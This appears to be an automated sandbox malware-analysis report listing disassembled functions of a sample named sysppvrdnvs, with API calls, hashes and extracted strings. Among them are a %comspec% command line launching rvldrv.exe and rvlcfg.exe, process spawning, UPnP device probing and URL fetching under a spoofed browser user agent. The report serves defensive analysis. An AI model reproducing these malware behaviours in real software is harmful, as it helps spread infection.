Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID:
API String ID: 3902698870-0
Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98

Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0040DD56
GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
GetCurrentThread.KERNEL32 ref: 0040DD68
SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
Sleep.KERNEL32(00000001), ref: 0040DE5E
GetCurrentThread.KERNEL32 ref: 0040DE6D
SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99

Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040F40E
memset.NTDLL ref: 0040F41E
CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
Sleep.KERNEL32(000003E8), ref: 0040F467
ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
Sleep.KERNEL32(000003E8), ref: 0040F49C

Strings

open, xrefs: 0040F47B
, xrefs: 0040F491
D, xrefs: 0040F426

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040666B
CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
wsprintfW.USER32 ref: 004066C4
wsprintfW.USER32 ref: 004066E5

Strings

/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
%comspec%, xrefs: 004066EE
cl@, xrefs: 004066A0
/c start %s & start %s\rvlcfg.exe, xrefs: 004066D9

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: wsprintf$CreateInitializeInstance
String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
API String ID: 1147330536-497122036
Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96

Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
Sleep.KERNEL32(000003E8), ref: 0040E36E
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE

Strings

HTTP/1.1 200 OK, xrefs: 0040E37F
LOCATION: , xrefs: 0040E395

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D

Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
InternetCloseHandle.WININET(00000000), ref: 0040F538
InternetCloseHandle.WININET(00000000), ref: 0040F542
Sleep.KERNEL32(000003E8), ref: 0040F54D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 2743515581-2960703779
Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55

Function 0040BC70 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
CloseHandle.KERNEL32(00000000), ref: 0040BD92
CloseHandle.KERNEL32(000000FF), ref: 0040BD9C

Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID:
API String ID: 439099756-0
Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C

Function 00405C00 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
CloseHandle.KERNEL32(00000000), ref: 00405D15
CloseHandle.KERNEL32(000000FF), ref: 00405D1F

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID:
API String ID: 3956458805-0
Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99

Function 004060A0 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
memcpy.NTDLL(?,00000000,00000100), ref: 00406141
CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
CloseHandle.KERNEL32(000000FF), ref: 004062DD
LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID:
API String ID: 1457358591-0
Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9

Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
SysFreeString.OLEAUT32(00000000), ref: 0040EDF7

Strings

deviceType, xrefs: 0040ED86
device, xrefs: 0040ED73

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95

Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
SysFreeString.OLEAUT32(00000000), ref: 0040EC97

Strings

service, xrefs: 0040EC13
serviceType, xrefs: 0040EC26

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9

Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
SysFreeString.OLEAUT32(00000000), ref: 0040EDF7

Strings

deviceType, xrefs: 0040ED86
device, xrefs: 0040ED73

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95

Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
SysFreeString.OLEAUT32(00000000), ref: 0040EC97

Strings

service, xrefs: 0040EC13
serviceType, xrefs: 0040EC26

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95

Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 0040786D
Sleep.KERNEL32(000003E8), ref: 0040789C
wsprintfA.USER32 ref: 004078C7
DeleteUrlCacheEntry.WININET(?), ref: 004078D7
Sleep.KERNEL32(000DBBA0), ref: 0040791F

Strings

%s%s, xrefs: 004078BB

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59

Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004063E6
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
RegCloseKey.ADVAPI32(?), ref: 0040647E

Strings

NoDrives, xrefs: 00406458
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99

Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04

Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

